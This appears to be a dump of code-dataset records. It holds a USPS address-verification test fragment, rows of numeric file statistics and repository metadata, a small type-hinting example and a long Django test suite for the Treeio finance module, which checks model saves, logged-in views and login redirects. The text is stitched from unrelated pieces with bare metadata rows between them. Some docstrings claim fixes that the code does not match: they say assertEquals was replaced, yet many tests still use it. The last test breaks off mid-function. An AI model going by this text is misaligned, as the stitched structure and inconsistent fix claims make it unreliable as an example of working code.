    req = """https://production.shippingapis.com/ShippingAPI.dll?API=Verify&XML=%3CAddressValidateRequest+USERID%3D%22foo_id%22%3E%3CAddress+ID%3D%220%22%3E%3CAddress1%2F%3E%3CAddress2%3E6406+Ivy+Lane%3C%2FAddress2%3E%3CCity%3EGreenbelt%3C%2FCity%3E%3CState%3EMD%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3CAddress+ID%3D%221%22%3E%3CAddress1%2F%3E%3CAddress2%3E8+Wildwood+Drive%3C%2FAddress2%3E%3CCity%3EOld+Lyme%3C%2FCity%3E%3CState%3ECT%3C%2FState%3E%3CZip5%2F%3E%3CZip4%2F%3E%3C%2FAddress%3E%3C%2FAddressValidateRequest%3E"""
    xml_response = StringIO(u"""<?xml version="1.0"?>
<AddressValidateResponse><Address ID="0"><Address2>6406 IVY LN</Address2><City>GREENBELT</City><State>MD</State><Zip5>20770</Zip5><Zip4>1441</Zip4></Address><Address ID="2"><Address2>8 WILDWOOD DR</Address2><City>OLD LYME</City><State>CT</State><Zip5>06371</Zip5><Zip4>1844</Zip4></Address></AddressValidateResponse>""")
    # Expect exactly one call with the exact request URL; feed back canned XML.
    fake_urlopen.expects_call().with_args(req).returns(xml_response)
    first = OrderedDict([
        ('address', '6406 Ivy Lane'),
        ('city', 'Greenbelt'),
        ('state', 'MD'),
    ])
    second = OrderedDict([
        ('address', '8 Wildwood Drive'),
        ('city', 'Old Lyme'),
        ('state', 'CT'),
    ])
    msg = assert_raises(IndexError, verify, 'foo_id', *[first, second])
    expected = ('The addresses returned are not in the same order '
                'they were requested')
    eq(str(msg), expected)
| 44.790984
| 542
| 0.628557
| 2,563
| 21,858
| 5.271947
| 0.077253
| 0.074082
| 0.049956
| 0.073268
| 0.919849
| 0.905269
| 0.905269
| 0.902605
| 0.897202
| 0.861456
| 0
| 0.095505
| 0.200979
| 21,858
| 487
| 543
| 44.882957
| 0.678156
| 0.002791
| 0
| 0.786697
| 0
| 0.06422
| 0.542739
| 0.157788
| 0
| 0
| 0
| 0
| 0.016055
| 1
| 0.036697
| false
| 0.004587
| 0.013761
| 0
| 0.050459
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe30ddc02b454a893268e338d20304d6046b832c
| 36
|
py
|
Python
|
src/posts/type_hinting/examples/02.py
|
pauleveritt/pauleveritt.github.io
|
3e4707dba1f3a57297f90c10cc2da4c3075c1a69
|
[
"BSD-3-Clause"
] | 8
|
2016-07-15T19:58:29.000Z
|
2021-03-11T09:57:11.000Z
|
src/posts/type_hinting/examples/02.py
|
pauleveritt/pauleveritt.github.io
|
3e4707dba1f3a57297f90c10cc2da4c3075c1a69
|
[
"BSD-3-Clause"
] | 2
|
2015-11-26T13:54:52.000Z
|
2016-03-03T13:04:17.000Z
|
src/posts/type_hinting/examples/02.py
|
pauleveritt/pauleveritt.github.io
|
3e4707dba1f3a57297f90c10cc2da4c3075c1a69
|
[
"BSD-3-Clause"
] | 6
|
2016-03-01T13:05:00.000Z
|
2016-10-11T16:37:18.000Z
|
def greeting() -> int:
    """Return the greeting value.

    Bug fix: the annotation previously claimed ``-> str`` while the body
    returns the int ``1``. The annotation is corrected to ``int`` so the
    declared contract matches the actual runtime behavior; callers receive
    the same value as before.
    NOTE(review): if a string greeting was intended, fix the return value
    instead -- confirm against callers.
    """
    return 1
| 12
| 22
| 0.583333
| 5
| 36
| 4.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 0.277778
| 36
| 2
| 23
| 18
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
fe9865e2534b8d05a76ed84f98874c21c1a83c81
| 43,149
|
py
|
Python
|
finance/tests.py
|
dynamicguy/treeio
|
4f674898cff2331711639a9b5f6812c874a2cb25
|
[
"MIT"
] | 2
|
2019-02-22T16:02:19.000Z
|
2019-02-23T19:27:34.000Z
|
finance/tests.py
|
dewmal/treeio
|
6299fbe7826800d576f7ab68b4c1996b7194540f
|
[
"MIT"
] | null | null | null |
finance/tests.py
|
dewmal/treeio
|
6299fbe7826800d576f7ab68b4c1996b7194540f
|
[
"MIT"
] | 1
|
2019-02-03T03:54:06.000Z
|
2019-02-03T03:54:06.000Z
|
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
"""
Finance: test suites
"""
from django.test import TestCase
from django.test.client import Client
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User as DjangoUser
from treeio.core.models import User, Group, Perspective, ModuleSetting, Object
from treeio.finance.models import Transaction, Liability, Category, Account, Equity, Asset, Currency, Tax
from treeio.identities.models import Contact, ContactType
class FinanceModelsTest(TestCase):
    """Finance models tests.

    Each test saves a model instance, checks that it got a primary key
    (and, where relevant, that its fields persisted), then deletes it.
    Fix: the deprecated ``assertEquals``/``assertNotEquals`` aliases
    (removed in Python 3.12) are replaced with ``assertEqual`` /
    ``assertIsNotNone``.
    """

    def test_model_category(self):
        "Test category model"
        obj = Category(name='test')
        obj.save()
        self.assertEqual('test', obj.name)
        self.assertIsNotNone(obj.id)
        obj.delete()

    def test_model_tax(self):
        "Test tax model"
        obj = Tax(name='test', rate=10)
        obj.save()
        self.assertEqual('test', obj.name)
        self.assertIsNotNone(obj.id)
        obj.delete()

    def test_model_equity(self):
        "Test equity model"
        # Equity needs a contact for both issuer and owner.
        contact_type = ContactType(name='test')
        contact_type.save()
        contact = Contact(name='test', contact_type=contact_type)
        contact.save()
        obj = Equity(issue_price=10, sell_price=10, issuer=contact, owner=contact)
        obj.save()
        self.assertIsNotNone(obj.id)
        obj.delete()

    def test_model_asset(self):
        "Test asset model"
        contact_type = ContactType(name='test')
        contact_type.save()
        contact = Contact(name='test', contact_type=contact_type)
        contact.save()
        obj = Asset(name='test', owner=contact)
        obj.save()
        self.assertEqual('test', obj.name)
        self.assertIsNotNone(obj.id)
        obj.delete()

    def test_model_liability(self):
        "Test liability model"
        contact_type = ContactType(name='test')
        contact_type.save()
        contact = Contact(name='test', contact_type=contact_type)
        contact.save()
        # Liabilities are denominated in a currency and held on an account.
        currency = Currency(code="GBP",
                            name="Pounds",
                            symbol="L",
                            is_default=True)
        currency.save()
        account = Account(name='test', owner=contact, balance_currency=currency)
        account.save()
        obj = Liability(name='test',
                        source=contact,
                        target=contact,
                        account=account,
                        value=10,
                        value_currency=currency)
        obj.save()
        self.assertEqual('test', obj.name)
        self.assertIsNotNone(obj.id)
        obj.delete()

    def test_model_account(self):
        "Test account model"
        contact_type = ContactType(name='test')
        contact_type.save()
        contact = Contact(name='test', contact_type=contact_type)
        contact.save()
        currency = Currency(code="GBP",
                            name="Pounds",
                            symbol="L",
                            is_default=True)
        currency.save()
        obj = Account(name='test', owner=contact,
                      balance_currency=currency)
        obj.save()
        self.assertEqual('test', obj.name)
        self.assertIsNotNone(obj.id)
        obj.delete()

    def test_model_transaction(self):
        "Test transaction model"
        contact_type = ContactType(name='test')
        contact_type.save()
        contact = Contact(name='test', contact_type=contact_type)
        contact.save()
        currency = Currency(code="GBP",
                            name="Pounds",
                            symbol="L",
                            is_default=True)
        currency.save()
        account = Account(name='test', owner=contact, balance_currency=currency)
        account.save()
        obj = Transaction(name='test',
                          account=account,
                          source=contact,
                          target=contact,
                          value=10,
                          value_currency=currency)
        obj.save()
        self.assertEqual('test', obj.name)
        self.assertIsNotNone(obj.id)
        obj.delete()
class FinanceViewsTest(TestCase):
"Finance functional tests for views"
username = "test"
password = "password"
prepared = False
def setUp(self):
"Initial Setup"
if not self.prepared:
# Clean up first
Object.objects.all().delete()
User.objects.all().delete()
# Create objects
self.group, created = Group.objects.get_or_create(name='test')
duser, created = DjangoUser.objects.get_or_create(username=self.username)
duser.set_password(self.password)
duser.save()
self.user, created = User.objects.get_or_create(user=duser)
self.user.save()
perspective, created = Perspective.objects.get_or_create(name='default')
perspective.set_default_user()
perspective.save()
ModuleSetting.set('default_perspective', perspective.id)
self.contact_type = ContactType(name='test')
self.contact_type.set_default_user()
self.contact_type.save()
self.contact = Contact(name='test', contact_type=self.contact_type)
self.contact.set_default_user()
self.contact.save()
self.category = Category(name='test')
self.category.set_default_user()
self.category.save()
self.equity = Equity(issue_price=10, sell_price=10, issuer=self.contact, owner=self.contact)
self.equity.set_default_user()
self.equity.save()
self.asset = Asset(name='test', owner=self.contact)
self.asset.set_default_user()
self.asset.save()
self.tax = Tax(name='test', rate=10)
self.tax.set_default_user()
self.tax.save()
self.currency = Currency(code="GBP",
name="Pounds",
symbol="L",
is_default=True)
self.currency.set_default_user()
self.currency.save()
self.account = Account(name='test', owner=self.contact, balance_currency=self.currency)
self.account.set_default_user()
self.account.save()
self.liability = Liability(name='test',
source=self.contact,
target=self.contact,
account=self.account,
value=10,
value_currency=self.currency)
self.liability.set_default_user()
self.liability.save()
self.transaction = Transaction(name='test', account=self.account, source=self.contact,
target=self.contact, value=10, value_currency=self.currency)
self.transaction.set_default_user()
self.transaction.save()
self.client = Client()
self.prepared = True
######################################
# Testing views when user is logged in
######################################
def test_finance_login(self):
"Test index page with login at /finance/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance'))
self.assertEquals(response.status_code, 200)
def test_finance_index_login(self):
"Test index page with login at /finance/index/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_transactions'))
self.assertEquals(response.status_code, 200)
def test_finance_income(self):
"Test index page with login at /finance/income/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_income_view'))
self.assertEquals(response.status_code, 200)
def test_finance_balance(self):
"Test index page with login at /finance/balance/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_balance_sheet'))
self.assertEquals(response.status_code, 200)
# Account
def test_finance_accounts_index(self):
"Test index page with login at /finance/accounts/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_accounts'))
self.assertEquals(response.status_code, 200)
def test_finance_account_add(self):
"Test index page with login at /finance/account/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_account_add'))
self.assertEquals(response.status_code, 200)
def test_finance_account_edit(self):
"Test index page with login at /finance/account/edit/<account_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_account_edit', args=[self.account.id]))
self.assertEquals(response.status_code, 200)
def test_finance_account_view(self):
"Test index page with login at /finance/account/view/<account_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_account_view', args=[self.account.id]))
self.assertEquals(response.status_code, 200)
def test_finance_account_delete(self):
"Test index page with login at /finance/account/delete/<account_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_account_delete', args=[self.account.id]))
self.assertEquals(response.status_code, 200)
# Asset
def test_finance_assets_index(self):
"Test index page with login at /finance/assets/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_assets'))
self.assertEquals(response.status_code, 200)
def test_finance_asset_add(self):
"Test index page with login at /finance/asset/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_asset_add'))
self.assertEquals(response.status_code, 200)
def test_finance_asset_edit(self):
"Test index page with login at /finance/asset/edit/<asset_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_asset_edit', args=[self.asset.id]))
self.assertEquals(response.status_code, 200)
def test_finance_asset_view(self):
"Test index page with login at /finance/asset/view/<asset_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_asset_view', args=[self.asset.id]))
self.assertEquals(response.status_code, 200)
def test_finance_asset_delete(self):
"Test index page with login at /finance/asset/delete/<asset_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_asset_delete', args=[self.asset.id]))
self.assertEquals(response.status_code, 200)
# Equity
def test_finance_equity_index(self):
"Test index page with login at /finance/equity/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_equities'))
self.assertEquals(response.status_code, 200)
def test_finance_equity_add(self):
"Test index page with login at /finance/equity/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_equity_add'))
self.assertEquals(response.status_code, 200)
def test_finance_equity_edit(self):
"Test index page with login at /finance/equity/edit/<equity_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_equity_edit', args=[self.equity.id]))
self.assertEquals(response.status_code, 200)
def test_finance_equity_view(self):
"Test index page with login at /finance/equity/view/<equity_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_equity_view', args=[self.equity.id]))
self.assertEquals(response.status_code, 200)
def test_finance_equity_delete(self):
"Test index page with login at /finance/equity/delete/<equity_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_equity_delete', args=[self.equity.id]))
self.assertEquals(response.status_code, 200)
# Transaction
def test_finance_transactions_index(self):
"Test index page with login at /finance/transaction/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_transactions'))
self.assertEquals(response.status_code, 200)
def test_finance_transaction_add(self):
"Test index page with login at /finance/transaction/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_transaction_add'))
self.assertEquals(response.status_code, 200)
def test_finance_transaction_add_liability(self):
"Test index page with login at /finance/transaction/add/liability/(?P<liability_id>\d+)"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_transaction_add', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
def test_finance_transaction_edit(self):
"Test index page with login at /finance/transaction/edit/<transaction_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_transaction_edit', args=[self.transaction.id]))
self.assertEquals(response.status_code, 200)
def test_finance_transaction_view(self):
"Test index page with login at /finance/transaction/view/<transaction_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_transaction_view', args=[self.transaction.id]))
self.assertEquals(response.status_code, 200)
def test_finance_transaction_delete(self):
"Test index page with login at /finance/transaction/delete/<transaction_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_transaction_delete', args=[self.transaction.id]))
self.assertEquals(response.status_code, 200)
# Liability
def test_finance_liability_index(self):
"Test index page with login at /finance/liability/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_liabilities'))
self.assertEquals(response.status_code, 200)
def test_finance_liability_add(self):
"Test index page with login at /finance/liability/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_liability_add'))
self.assertEquals(response.status_code, 200)
def test_finance_liability_edit(self):
"Test index page with login at /finance/liability/edit/<liability_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_liability_edit', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
def test_finance_liability_view(self):
"Test index page with login at /finance/liability/view/<liability_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_liability_view', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
def test_finance_liability_delete(self):
"Test index page with login at /finance/liability/delete/<liability_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_liability_delete', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
# Receivables
def test_finance_receivables_index(self):
"Test index page with login at /finance/receivables/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_index_receivables'))
self.assertEquals(response.status_code, 200)
def test_finance_receivable_add(self):
"Test index page with login at /finance/receivable/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_receivable_add'))
self.assertEquals(response.status_code, 200)
def test_finance_receivable_edit(self):
"Test index page with login at /finance/receivable/edit/<receivable_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_receivable_edit', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
def test_finance_receivable_view(self):
"Test index page with login at /finance/receivable/view/<receivable_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_receivable_view', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
def test_finance_receivable_delete(self):
"Test index page with login at /finance/liability/delete/<receivable_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_receivable_delete', args=[self.liability.id]))
self.assertEquals(response.status_code, 200)
# Category
def test_finance_category_add(self):
"Test index page with login at /finance/category/add/"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_category_add'))
self.assertEquals(response.status_code, 200)
def test_finance_category_edit(self):
"Test index page with login at /finance/category/edit/<category_id>"
response = self.client.post('/accounts/login',
{'username': self.username, 'password': self.password })
self.assertRedirects(response, '/')
response = self.client.get(reverse('finance_category_edit', args=[self.category.id]))
self.assertEquals(response.status_code, 200)
# Each test below authenticates via POST to /accounts/login (a successful
# login redirects to '/'), then asserts the target finance page renders
# with HTTP 200.  assertEqual replaces the deprecated assertEquals alias
# (removed in Python 3.12).
def test_finance_category_view(self):
    "Test index page with login at /finance/category/view/<category_id>"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_category_view', args=[self.category.id]))
    self.assertEqual(response.status_code, 200)

def test_finance_category_delete(self):
    "Test index page with login at /finance/category/delete/<category_id>"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_category_delete', args=[self.category.id]))
    self.assertEqual(response.status_code, 200)

# Currency
def test_finance_currency_add(self):
    "Test index page with login at /finance/currency/add/"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_currency_add'))
    self.assertEqual(response.status_code, 200)

def test_finance_currency_edit(self):
    "Test index page with login at /finance/currency/edit/<currency_id>"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_currency_edit', args=[self.currency.id]))
    self.assertEqual(response.status_code, 200)

def test_finance_currency_view(self):
    "Test index page with login at /finance/currency/view/<currency_id>"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_currency_view', args=[self.currency.id]))
    self.assertEqual(response.status_code, 200)

def test_finance_currency_delete(self):
    "Test index page with login at /finance/currency/delete/<currency_id>"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_currency_delete', args=[self.currency.id]))
    self.assertEqual(response.status_code, 200)

# Taxes
def test_finance_tax_add(self):
    "Test index page with login at /finance/tax/add/"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_tax_add'))
    self.assertEqual(response.status_code, 200)

def test_finance_tax_edit(self):
    "Test index page with login at /finance/tax/edit/<tax_id>"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_tax_edit', args=[self.tax.id]))
    self.assertEqual(response.status_code, 200)

def test_finance_tax_view(self):
    "Test index page with login at /finance/tax/view/<tax_id>"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_tax_view', args=[self.tax.id]))
    self.assertEqual(response.status_code, 200)

def test_finance_tax_delete(self):
    "Test index page with login at /finance/tax/delete/<tax_id>"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_tax_delete', args=[self.tax.id]))
    self.assertEqual(response.status_code, 200)

# Settings
def test_finance_settings_view(self):
    "Test index page with login at /finance/settings/view/"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_settings_view'))
    self.assertEqual(response.status_code, 200)

def test_finance_settings_edit(self):
    "Test index page with login at /finance/settings/edit/"
    response = self.client.post('/accounts/login',
                                {'username': self.username, 'password': self.password})
    self.assertRedirects(response, '/')
    response = self.client.get(reverse('finance_settings_edit'))
    self.assertEqual(response.status_code, 200)
######################################
# Testing views when user is not logged in
######################################
def test_index(self):
    """Anonymous GET of /finance/ must redirect to the login page."""
    self.assertRedirects(self.client.get('/finance/'), reverse('user_login'))

def test_finance_index_out(self):
    """Anonymous GET of /finance/index/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_index_transactions')),
                         reverse('user_login'))

def test_finance_income_out(self):
    """Anonymous GET of /finance/income/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_income_view')),
                         reverse('user_login'))

def test_finance_balance_out(self):
    """Anonymous GET of /finance/balance/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_balance_sheet')),
                         reverse('user_login'))
# Account
def test_finance_accounts_index_out(self):
    """Anonymous GET of /finance/accounts/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_index_accounts')),
                         reverse('user_login'))

def test_finance_account_add_out(self):
    """Anonymous GET of /finance/account/add/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_account_add')),
                         reverse('user_login'))

def test_finance_account_edit_out(self):
    """Anonymous GET of /finance/account/edit/<account_id> must redirect to login."""
    url = reverse('finance_account_edit', args=[self.account.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_account_view_out(self):
    """Anonymous GET of /finance/account/view/<account_id> must redirect to login."""
    url = reverse('finance_account_view', args=[self.account.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_account_delete_out(self):
    """Anonymous GET of /finance/account/delete/<account_id> must redirect to login."""
    url = reverse('finance_account_delete', args=[self.account.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))
# Asset
def test_finance_assets_index_out(self):
    """Anonymous GET of /finance/assets/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_index_assets')),
                         reverse('user_login'))

def test_finance_asset_add_out(self):
    """Anonymous GET of /finance/asset/add/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_asset_add')),
                         reverse('user_login'))

def test_finance_asset_edit_out(self):
    """Anonymous GET of /finance/asset/edit/<asset_id> must redirect to login."""
    url = reverse('finance_asset_edit', args=[self.asset.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_asset_view_out(self):
    """Anonymous GET of /finance/asset/view/<asset_id> must redirect to login."""
    url = reverse('finance_asset_view', args=[self.asset.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_asset_delete_out(self):
    """Anonymous GET of /finance/asset/delete/<asset_id> must redirect to login."""
    url = reverse('finance_asset_delete', args=[self.asset.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))
# Equity
# Equity views must redirect anonymous users to the login page.
def test_finance_equity_index_out(self):
    "Testing /finance/equity/"
    response = self.client.get(reverse('finance_index_equities'))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_equity_add_out(self):
    "Testing /finance/equity/add/"
    response = self.client.get(reverse('finance_equity_add'))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_equity_edit_out(self):
    # Docstring typo fixed: "Tesing" -> "Testing".
    "Testing /finance/equity/edit/<equity_id>"
    response = self.client.get(reverse('finance_equity_edit', args=[self.equity.id]))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_equity_view_out(self):
    "Testing /finance/equity/view/<equity_id>"
    response = self.client.get(reverse('finance_equity_view', args=[self.equity.id]))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_equity_delete_out(self):
    "Testing /finance/equity/delete/<equity_id>"
    response = self.client.get(reverse('finance_equity_delete', args=[self.equity.id]))
    self.assertRedirects(response, reverse('user_login'))
# Transaction
# Transaction views must redirect anonymous users to the login page.
def test_finance_transactions_index_out(self):
    "Testing /finance/transaction/"
    response = self.client.get(reverse('finance_index_transactions'))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_transaction_add_out(self):
    "Testing /finance/transaction/add/"
    response = self.client.get(reverse('finance_transaction_add'))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_transaction_add_liability_out(self):
    # Raw string: the URL regex contains '\d', which is an invalid escape
    # sequence in a normal string literal (SyntaxWarning on newer Pythons).
    r"Testing /finance/transaction/add/liability/(?P<liability_id>\d+)"
    response = self.client.get(reverse('finance_transaction_add', args=[self.liability.id]))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_transaction_edit_out(self):
    "Testing /finance/transaction/edit/<transaction_id>"
    response = self.client.get(reverse('finance_transaction_edit', args=[self.transaction.id]))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_transaction_view_out(self):
    "Testing /finance/transaction/view/<transaction_id>"
    response = self.client.get(reverse('finance_transaction_view', args=[self.transaction.id]))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_transaction_delete_out(self):
    "Testing /finance/transaction/delete/<transaction_id>"
    response = self.client.get(reverse('finance_transaction_delete', args=[self.transaction.id]))
    self.assertRedirects(response, reverse('user_login'))
# Liability
def test_finance_liability_index_out(self):
    """Anonymous GET of /finance/liability/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_index_liabilities')),
                         reverse('user_login'))

def test_finance_liability_add_out(self):
    """Anonymous GET of /finance/liability/add/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_liability_add')),
                         reverse('user_login'))

def test_finance_liability_edit_out(self):
    """Anonymous GET of /finance/liability/edit/<liability_id> must redirect to login."""
    url = reverse('finance_liability_edit', args=[self.liability.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_liability_view_out(self):
    """Anonymous GET of /finance/liability/view/<liability_id> must redirect to login."""
    url = reverse('finance_liability_view', args=[self.liability.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_liability_delete_out(self):
    """Anonymous GET of /finance/liability/delete/<liability_id> must redirect to login."""
    url = reverse('finance_liability_delete', args=[self.liability.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))
# Receivables
# Receivable views must redirect anonymous users to the login page.
# NOTE(review): these tests pass self.liability.id where a receivable id is
# expected by the URL — presumably no receivable fixture exists; confirm the
# receivable views accept (or 404 only after the auth redirect on) that id.
def test_finance_receivables_index_out(self):
    "Testing /finance/receivables/"
    response = self.client.get(reverse('finance_index_receivables'))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_receivable_add_out(self):
    "Testing /finance/receivable/add/"
    response = self.client.get(reverse('finance_receivable_add'))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_receivable_edit_out(self):
    "Testing /finance/receivable/edit/<receivable_id>"
    response = self.client.get(reverse('finance_receivable_edit', args=[self.liability.id]))
    self.assertRedirects(response, reverse('user_login'))

def test_finance_receivable_view_out(self):
    "Testing /finance/receivable/view/<receivable_id>"
    response = self.client.get(reverse('finance_receivable_view', args=[self.liability.id]))
